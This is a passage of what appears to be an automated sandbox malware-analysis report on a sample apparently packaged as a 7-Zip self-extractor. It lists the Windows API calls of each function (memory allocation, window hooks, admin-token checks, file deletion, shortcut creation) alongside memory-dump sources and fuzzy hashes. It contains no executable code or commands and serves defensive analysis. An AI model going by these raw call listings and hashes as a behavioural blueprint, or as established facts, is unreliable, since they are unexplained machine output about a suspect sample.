                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                      • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                      • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                      • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                      Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                      • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                      • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                      • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                      Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                      • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                      • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                      • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

                                                                      Non-executed Functions

                                                                      Function 0040385E Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 290comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wtol.MSVCRT ref: 00403882
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,xu_,00000000,H|_), ref: 00403925
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                      • _wtol.MSVCRT ref: 00403A1C
                                                                      • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                      • String ID: .lnk$H|_$xu_
                                                                      • API String ID: 408529070-3512132489
                                                                      • Opcode ID: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                                      • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                      • Opcode Fuzzy Hash: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                                      • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                      Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • wsprintfW.USER32 ref: 004021E7
                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • GetLastError.KERNEL32 ref: 00402201
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • GetLastError.KERNEL32 ref: 00402236
                                                                      • lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                      • ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                      • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                      • SetLastError.KERNEL32(?), ref: 00402282
                                                                      • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • _wtol.MSVCRT ref: 00402314
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,02533FD0,00000002), ref: 00402334
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                      • String ID: 7zSfxString%d
                                                                      • API String ID: 2117570002-3906403175
                                                                      • Opcode ID: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                                      • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                      • Opcode Fuzzy Hash: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                                      • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                      Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                      • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                      • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                      • wsprintfW.USER32 ref: 00401E7F
                                                                      • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                      • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                      • API String ID: 2639302590-365843014
                                                                      • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                      • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                      • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                      • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                      Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                      • GetLastError.KERNEL32 ref: 00408DF4
                                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                      • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                      • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                      • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                      • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                      • String ID:
                                                                      • API String ID: 829399097-0
                                                                      • Opcode ID: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                                      • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                      • Opcode Fuzzy Hash: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                                      • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                      Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                      • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                      • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                      • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                      • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 1862581289-0
                                                                      • Opcode ID: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                                      • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                      • Opcode Fuzzy Hash: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                                      • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                      Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                      • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                      • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                      • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentHookThreadWindows$Dialog
                                                                      • String ID:
                                                                      • API String ID: 1967849563-0
                                                                      • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                      • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                      • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                      • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                      Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                      • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                      • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                      • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                      • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                      Function 0040AD30 Relevance: .5, Instructions: 479COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                      • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                      • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                      • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                      Function 00413D43 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                      • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                      Function 00413370 Relevance: .1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                      • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                      • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                      • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                      Function 004139D1 Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                      • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                      • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                      • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                      Function 00413AAB Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                      • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                      Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
